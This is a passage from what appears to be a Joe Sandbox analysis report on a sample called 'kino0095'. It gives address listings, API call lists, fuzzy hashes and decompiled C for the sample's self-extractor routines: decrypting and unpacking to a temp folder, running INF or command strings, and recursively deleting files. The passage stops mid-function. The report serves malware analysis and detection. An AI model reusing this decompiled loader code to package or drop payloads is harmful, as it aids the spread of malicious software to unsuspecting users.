                                                                                                                                                                                                                                    0x010b1da7
                                                                                                                                                                                                                                    0x010b1da8
                                                                                                                                                                                                                                    0x010b1dac
                                                                                                                                                                                                                                    0x010b1dae
                                                                                                                                                                                                                                    0x010b1db4
                                                                                                                                                                                                                                    0x010b1db7
                                                                                                                                                                                                                                    0x010b1db7
                                                                                                                                                                                                                                    0x010b1db9
                                                                                                                                                                                                                                    0x010b1dba
                                                                                                                                                                                                                                    0x010b1dbe
                                                                                                                                                                                                                                    0x010b1dc3
                                                                                                                                                                                                                                    0x010b1dce
                                                                                                                                                                                                                                    0x010b1dd2
                                                                                                                                                                                                                                    0x010b1deb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b1df0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b1dd2
                                                                                                                                                                                                                                    0x010b1bf7
                                                                                                                                                                                                                                    0x010b1bfe
                                                                                                                                                                                                                                    0x010b1c07
                                                                                                                                                                                                                                    0x010b1d55
                                                                                                                                                                                                                                    0x010b1d5a
                                                                                                                                                                                                                                    0x010b1d5b
                                                                                                                                                                                                                                    0x010b1d5d
                                                                                                                                                                                                                                    0x010b1d5e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b1c1b
                                                                                                                                                                                                                                    0x010b1c1b
                                                                                                                                                                                                                                    0x010b1c20
                                                                                                                                                                                                                                    0x010b1c2c
                                                                                                                                                                                                                                    0x010b1c33
                                                                                                                                                                                                                                    0x010b1c38
                                                                                                                                                                                                                                    0x010b1c3a
                                                                                                                                                                                                                                    0x010b1c3a
                                                                                                                                                                                                                                    0x010b1c40
                                                                                                                                                                                                                                    0x010b1c4b
                                                                                                                                                                                                                                    0x010b1c4b
                                                                                                                                                                                                                                    0x010b1c5d
                                                                                                                                                                                                                                    0x010b1c61
                                                                                                                                                                                                                                    0x010b1dd4
                                                                                                                                                                                                                                    0x010b1dd4
                                                                                                                                                                                                                                    0x010b1dd6
                                                                                                                                                                                                                                    0x010b1ddb
                                                                                                                                                                                                                                    0x010b1ddc
                                                                                                                                                                                                                                    0x010b1dde
                                                                                                                                                                                                                                    0x010b1d64
                                                                                                                                                                                                                                    0x010b1d64
                                                                                                                                                                                                                                    0x010b1d67
                                                                                                                                                                                                                                    0x010b1d6c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b1c67
                                                                                                                                                                                                                                    0x010b1c67
                                                                                                                                                                                                                                    0x010b1c6d
                                                                                                                                                                                                                                    0x010b1c72
                                                                                                                                                                                                                                    0x010b1c74
                                                                                                                                                                                                                                    0x010b1c74
                                                                                                                                                                                                                                    0x010b1c8e
                                                                                                                                                                                                                                    0x010b1c99
                                                                                                                                                                                                                                    0x010b1cc0
                                                                                                                                                                                                                                    0x010b1cf8
                                                                                                                                                                                                                                    0x010b1d07
                                                                                                                                                                                                                                    0x010b1d23
                                                                                                                                                                                                                                    0x010b1d09
                                                                                                                                                                                                                                    0x010b1d14
                                                                                                                                                                                                                                    0x010b1d1b
                                                                                                                                                                                                                                    0x010b1d1b
                                                                                                                                                                                                                                    0x010b1d2b
                                                                                                                                                                                                                                    0x010b1d2d
                                                                                                                                                                                                                                    0x010b1d2d
                                                                                                                                                                                                                                    0x010b1d38
                                                                                                                                                                                                                                    0x010b1d39
                                                                                                                                                                                                                                    0x010b1d46
                                                                                                                                                                                                                                    0x010b1cc2
                                                                                                                                                                                                                                    0x010b1cc2
                                                                                                                                                                                                                                    0x010b1ccc
                                                                                                                                                                                                                                    0x010b1cce
                                                                                                                                                                                                                                    0x010b1cce
                                                                                                                                                                                                                                    0x010b1cdb
                                                                                                                                                                                                                                    0x010b1ce6
                                                                                                                                                                                                                                    0x010b1cee
                                                                                                                                                                                                                                    0x010b1cee
                                                                                                                                                                                                                                    0x010b1e89
                                                                                                                                                                                                                                    0x010b1e91
                                                                                                                                                                                                                                    0x010b1e92
                                                                                                                                                                                                                                    0x010b1e94
                                                                                                                                                                                                                                    0x010b1e97
                                                                                                                                                                                                                                    0x010b1ea4
                                                                                                                                                                                                                                    0x010b1ea4
                                                                                                                                                                                                                                    0x010b1c61
                                                                                                                                                                                                                                    0x010b1c07
                                                                                                                                                                                                                                    0x010b1bd3
                                                                                                                                                                                                                                    0x010b1b7b

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 010B1BE7
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 010B1BFE
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 010B1C57
                                                                                                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32 ref: 010B1C88
                                                                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,010B1140,00000000,00000008,?), ref: 010B1CB8
                                                                                                                                                                                                                                    • GetShortPathNameA.KERNEL32 ref: 010B1D1B
                                                                                                                                                                                                                                      • Part of subcall function 010B44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010B4518
                                                                                                                                                                                                                                      • Part of subcall function 010B44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 010B4554
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                    • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                    • API String ID: 383838535-2145762761
                                                                                                                                                                                                                                    • Opcode ID: 461e35994a94ce858a5dc4ac6a0cfba0b258becc0f26de5931e5f34fef0e732f
                                                                                                                                                                                                                                    • Instruction ID: 13bfc113a88a84ae7b12aa35f8072cfb78938a565ec28101a33b9d87d211b4be
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 461e35994a94ce858a5dc4ac6a0cfba0b258becc0f26de5931e5f34fef0e732f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8BA19F70A002086BEB70AB28ECE4FEA77ADEB55310F1046D5E5D5A32C0DB759E85CB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B2F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120libraryfileloaderCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 450 10b2f1d-10b2f3d 451 10b2f3f-10b2f46 450->451 452 10b2f6c-10b2f73 call 10b5164 450->452 453 10b2f48 call 10b51e5 451->453 454 10b2f5f-10b2f66 call 10b3a3f 451->454 459 10b2f79-10b2f80 call 10b55a0 452->459 460 10b3041 452->460 461 10b2f4d-10b2f4f 453->461 454->452 454->460 459->460 468 10b2f86-10b2fbe GetSystemDirectoryA call 10b658a LoadLibraryA 459->468 464 10b3043-10b3053 call 10b6ce0 460->464 461->460 465 10b2f55-10b2f5d 461->465 465->452 465->454 472 10b2fc0-10b2fd4 GetProcAddress 468->472 473 10b2ff7-10b3004 FreeLibrary 468->473 472->473 474 10b2fd6-10b2fee DecryptFileA 472->474 475 10b3017-10b3024 SetCurrentDirectoryA 473->475 476 10b3006-10b300c 473->476 474->473 489 10b2ff0-10b2ff5 474->489 477 10b3026-10b303c call 10b44b9 call 10b6285 475->477 478 10b3054-10b305a 475->478 476->475 479 10b300e call 10b621e 476->479 477->460 482 10b305c call 10b3b26 478->482 483 10b3065-10b306c 478->483 487 10b3013-10b3015 479->487 495 10b3061-10b3063 482->495 485 10b306e-10b3075 call 10b256d 483->485 486 10b307c-10b3089 483->486 496 10b307a 485->496 492 10b308b-10b3091 486->492 493 10b30a1-10b30a9 486->493 487->460 487->475 489->473 492->493 497 10b3093 call 10b3ba2 492->497 499 10b30ab-10b30ad 493->499 500 10b30b4-10b30b7 493->500 495->460 495->483 496->486 503 10b3098-10b309a 497->503 499->500 502 10b30af call 10b4169 499->502 500->464 502->500 503->460 505 10b309c 503->505 505->493
                                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                                    			E010B2F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0x10b8004; // 0x72151d89
				_v8 = _t9 ^ _t46;
				if( *0x10b8a38 != 0) {
					L5:
					_t11 = E010B5164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E010B6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E010B55A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E010B658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0x10ba288("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0x10b8a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0x10b8a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0x10b8d48 & 0x000000c0;
									if(( *0x10b8d48 & 0x000000c0) == 0) {
										_t41 =  *0x10b9a40; // 0x3, executed
										_t26 = E010B256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0x10b8a24; // 0x0
									 *0x10b9a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0x10b8a38;
										if( *0x10b8a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E010B4169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0x10b9a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E010B3BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0x10b8a24; // 0x0
										goto L26;
									}
								}
								_t27 = E010B3B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E010B44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0x10b9124 = E010B6285();
							goto L16;
						}
						_t59 =  *0x10b9a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E010B621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0x10b8a24;
				if( *0x10b8a24 != 0) {
					L4:
					_t34 = E010B3A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E010B51E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0x10b8a38;
				if( *0x10b8a38 != 0) {
					goto L5;
				}
				goto L4;
			}




























                                                                                                                                                                                                                                    0x010b2f1d
                                                                                                                                                                                                                                    0x010b2f28
                                                                                                                                                                                                                                    0x010b2f2f
                                                                                                                                                                                                                                    0x010b2f3d
                                                                                                                                                                                                                                    0x010b2f6c
                                                                                                                                                                                                                                    0x010b2f6c
                                                                                                                                                                                                                                    0x010b2f71
                                                                                                                                                                                                                                    0x010b2f73
                                                                                                                                                                                                                                    0x010b3041
                                                                                                                                                                                                                                    0x010b3041
                                                                                                                                                                                                                                    0x010b3043
                                                                                                                                                                                                                                    0x010b3053
                                                                                                                                                                                                                                    0x010b3053
                                                                                                                                                                                                                                    0x010b2f79
                                                                                                                                                                                                                                    0x010b2f80
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b2f86
                                                                                                                                                                                                                                    0x010b2f86
                                                                                                                                                                                                                                    0x010b2f93
                                                                                                                                                                                                                                    0x010b2f9e
                                                                                                                                                                                                                                    0x010b2fa0
                                                                                                                                                                                                                                    0x010b2fa6
                                                                                                                                                                                                                                    0x010b2fb8
                                                                                                                                                                                                                                    0x010b2fba
                                                                                                                                                                                                                                    0x010b2fbe
                                                                                                                                                                                                                                    0x010b2fc6
                                                                                                                                                                                                                                    0x010b2fcc
                                                                                                                                                                                                                                    0x010b2fd4
                                                                                                                                                                                                                                    0x010b2fd6
                                                                                                                                                                                                                                    0x010b2fd8
                                                                                                                                                                                                                                    0x010b2fe0
                                                                                                                                                                                                                                    0x010b2fe6
                                                                                                                                                                                                                                    0x010b2fee
                                                                                                                                                                                                                                    0x010b2ff0
                                                                                                                                                                                                                                    0x010b2ff5
                                                                                                                                                                                                                                    0x010b2ff5
                                                                                                                                                                                                                                    0x010b2fee
                                                                                                                                                                                                                                    0x010b2fd4
                                                                                                                                                                                                                                    0x010b2ff8
                                                                                                                                                                                                                                    0x010b2ffe
                                                                                                                                                                                                                                    0x010b3004
                                                                                                                                                                                                                                    0x010b3017
                                                                                                                                                                                                                                    0x010b301c
                                                                                                                                                                                                                                    0x010b3024
                                                                                                                                                                                                                                    0x010b3054
                                                                                                                                                                                                                                    0x010b305a
                                                                                                                                                                                                                                    0x010b3065
                                                                                                                                                                                                                                    0x010b3065
                                                                                                                                                                                                                                    0x010b306c
                                                                                                                                                                                                                                    0x010b306e
                                                                                                                                                                                                                                    0x010b3075
                                                                                                                                                                                                                                    0x010b307a
                                                                                                                                                                                                                                    0x010b307a
                                                                                                                                                                                                                                    0x010b307c
                                                                                                                                                                                                                                    0x010b3081
                                                                                                                                                                                                                                    0x010b3087
                                                                                                                                                                                                                                    0x010b3089
                                                                                                                                                                                                                                    0x010b30a1
                                                                                                                                                                                                                                    0x010b30a1
                                                                                                                                                                                                                                    0x010b30a9
                                                                                                                                                                                                                                    0x010b30ab
                                                                                                                                                                                                                                    0x010b30ad
                                                                                                                                                                                                                                    0x010b30af
                                                                                                                                                                                                                                    0x010b30af
                                                                                                                                                                                                                                    0x010b30ad
                                                                                                                                                                                                                                    0x010b30b6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b308b
                                                                                                                                                                                                                                    0x010b308b
                                                                                                                                                                                                                                    0x010b3091
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3093
                                                                                                                                                                                                                                    0x010b3098
                                                                                                                                                                                                                                    0x010b309a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b309c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b309c
                                                                                                                                                                                                                                    0x010b3089
                                                                                                                                                                                                                                    0x010b305c
                                                                                                                                                                                                                                    0x010b3061
                                                                                                                                                                                                                                    0x010b3063
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3063
                                                                                                                                                                                                                                    0x010b302b
                                                                                                                                                                                                                                    0x010b3032
                                                                                                                                                                                                                                    0x010b303c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b303c
                                                                                                                                                                                                                                    0x010b3006
                                                                                                                                                                                                                                    0x010b300c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b300e
                                                                                                                                                                                                                                    0x010b3015
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3015
                                                                                                                                                                                                                                    0x010b2f80
                                                                                                                                                                                                                                    0x010b2f3f
                                                                                                                                                                                                                                    0x010b2f46
                                                                                                                                                                                                                                    0x010b2f5f
                                                                                                                                                                                                                                    0x010b2f5f
                                                                                                                                                                                                                                    0x010b2f64
                                                                                                                                                                                                                                    0x010b2f66
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b2f66
                                                                                                                                                                                                                                    0x010b2f4f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b2f55
                                                                                                                                                                                                                                    0x010b2f5d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 010B2F93
                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 010B2FB2
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 010B2FC6
                                                                                                                                                                                                                                    • DecryptFileA.ADVAPI32 ref: 010B2FE6
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 010B2FF8
                                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 010B301C
                                                                                                                                                                                                                                      • Part of subcall function 010B51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,010B2F4D,?,00000002,00000000), ref: 010B5201
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                    • API String ID: 2126469477-4070797333
                                                                                                                                                                                                                                    • Opcode ID: cf54fb3157ad6294e6cbc5c57edf292dab78ffac3014fc8b8b490037aeb2712b
                                                                                                                                                                                                                                    • Instruction ID: f2af1d80f3aa66d30a1eeb85cc5fc16dfb9ad1bdf075f118167de6ebd417d022
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf54fb3157ad6294e6cbc5c57edf292dab78ffac3014fc8b8b490037aeb2712b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C410B30A202068AEB71AB399CD56DA77FCFF44744F2041A9FAC1D6145EB7AC980CB60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B2390 Relevance: 12.1, APIs: 8, Instructions: 93filestringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                    			E010B2390(CHAR* __ecx) {
				signed int _v8;
				char _v276;
				char _v280;
				char _v284;
				struct _WIN32_FIND_DATAA _v596;
				struct _WIN32_FIND_DATAA _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				int _t36;
				void* _t46;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				void* _t66;
				signed int _t67;
				signed int _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x254;
				_t21 =  *0x10b8004; // 0x72151d89
				_t22 = _t21 ^ _t69;
				_v8 = _t21 ^ _t69;
				_t65 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L10:
					_pop(_t62);
					_pop(_t66);
					_pop(_t46);
					return E010B6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
				} else {
					E010B1680( &_v276, 0x104, __ecx);
					_t58 = 0x104;
					E010B16B3( &_v280, 0x104, "*");
					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
					_t63 = _t22;
					if(_t63 == 0xffffffff) {
						goto L10;
					} else {
						goto L3;
					}
					do {
						L3:
						_t58 = 0x104;
						E010B1680( &_v276, 0x104, _t65);
						if((_v604.ftCreationTime & 0x00000010) == 0) {
							_t58 = 0x104;
							E010B16B3( &_v276, 0x104,  &(_v596.dwReserved1));
							SetFileAttributesA( &_v280, 0x80);
							DeleteFileA( &_v280);
						} else {
							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
								E010B16B3( &_v276, 0x104,  &(_v596.cFileName));
								_t58 = 0x104;
								E010B658A( &_v280, 0x104, 0x10b1140);
								E010B2390( &_v284);
							}
						}
						_t36 = FindNextFileA(_t63,  &_v596); // executed
					} while (_t36 != 0);
					FindClose(_t63); // executed
					_t22 = RemoveDirectoryA(_t65); // executed
					goto L10;
				}
			}





















                                                                                                                                                                                                                                    0x010b2398
                                                                                                                                                                                                                                    0x010b239e
                                                                                                                                                                                                                                    0x010b23a3
                                                                                                                                                                                                                                    0x010b23a5
                                                                                                                                                                                                                                    0x010b23ae
                                                                                                                                                                                                                                    0x010b23b3
                                                                                                                                                                                                                                    0x010b24cb
                                                                                                                                                                                                                                    0x010b24d2
                                                                                                                                                                                                                                    0x010b24d3
                                                                                                                                                                                                                                    0x010b24d4
                                                                                                                                                                                                                                    0x010b24df
                                                                                                                                                                                                                                    0x010b23c2
                                                                                                                                                                                                                                    0x010b23d1
                                                                                                                                                                                                                                    0x010b23db
                                                                                                                                                                                                                                    0x010b23e4
                                                                                                                                                                                                                                    0x010b23f6
                                                                                                                                                                                                                                    0x010b23fc
                                                                                                                                                                                                                                    0x010b2401
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b2407
                                                                                                                                                                                                                                    0x010b2407
                                                                                                                                                                                                                                    0x010b2408
                                                                                                                                                                                                                                    0x010b2411
                                                                                                                                                                                                                                    0x010b241f
                                                                                                                                                                                                                                    0x010b247a
                                                                                                                                                                                                                                    0x010b2483
                                                                                                                                                                                                                                    0x010b2495
                                                                                                                                                                                                                                    0x010b24a3
                                                                                                                                                                                                                                    0x010b2421
                                                                                                                                                                                                                                    0x010b242f
                                                                                                                                                                                                                                    0x010b2453
                                                                                                                                                                                                                                    0x010b245d
                                                                                                                                                                                                                                    0x010b2466
                                                                                                                                                                                                                                    0x010b2472
                                                                                                                                                                                                                                    0x010b2472
                                                                                                                                                                                                                                    0x010b242f
                                                                                                                                                                                                                                    0x010b24af
                                                                                                                                                                                                                                    0x010b24b5
                                                                                                                                                                                                                                    0x010b24be
                                                                                                                                                                                                                                    0x010b24c5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b24c5

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FindFirstFileA.KERNELBASE(?,010B8A3A,010B11F4,010B8A3A,00000000,?,?), ref: 010B23F6
                                                                                                                                                                                                                                    • lstrcmpA.KERNEL32(?,010B11F8), ref: 010B2427
                                                                                                                                                                                                                                    • lstrcmpA.KERNEL32(?,010B11FC), ref: 010B243B
                                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 010B2495
                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 010B24A3
                                                                                                                                                                                                                                    • FindNextFileA.KERNELBASE(00000000,00000010), ref: 010B24AF
                                                                                                                                                                                                                                    • FindClose.KERNELBASE(00000000), ref: 010B24BE
                                                                                                                                                                                                                                    • RemoveDirectoryA.KERNELBASE(010B8A3A), ref: 010B24C5
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 836429354-0
                                                                                                                                                                                                                                    • Opcode ID: da4fd9ed98f508b461b727be5b878896f74e799849818ad9835bfe107652d38f
                                                                                                                                                                                                                                    • Instruction ID: 31748d84a25a30f878f1487b5f0c5d175b177b99e4bd59d904ef248b4d4ffba5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da4fd9ed98f508b461b727be5b878896f74e799849818ad9835bfe107652d38f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 333190316046419BD330EAA8DCC9AEB77ECABC9305F04492EA5D587284EF78A9498752
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B2BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 70%
                                                                                                                                                                                                                                    			E010B2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t4;
				void* _t6;
				intOrPtr _t7;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t17;
				signed char _t19;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				intOrPtr _t32;

				_t4 = GetVersion();
				if(_t4 >= 0 && _t4 >= 6) {
					_t12 = GetModuleHandleW(L"Kernel32.dll");
					if(_t12 != 0) {
						_t21 = GetProcAddress(_t12, "HeapSetInformation");
						if(_t21 != 0) {
							_t17 = _t21;
							 *0x10ba288(0, 1, 0, 0);
							 *_t21();
							_t29 = _t24 - _t24;
							if(_t24 != _t24) {
								_t17 = 4;
								asm("int 0x29");
							}
						}
					}
				}
				_t20 = _a12;
				_t18 = _a4;
				 *0x10b9124 = 0;
				if(E010B2CAA(_a4, _a12, _t29, _t17) != 0) {
					_t9 = E010B2F1D(_t18, _t20); // executed
					_t22 = _t9; // executed
					E010B52B6(0, _t18, _t21, _t22); // executed
					if(_t22 != 0) {
						_t32 =  *0x10b8a3a; // 0x0
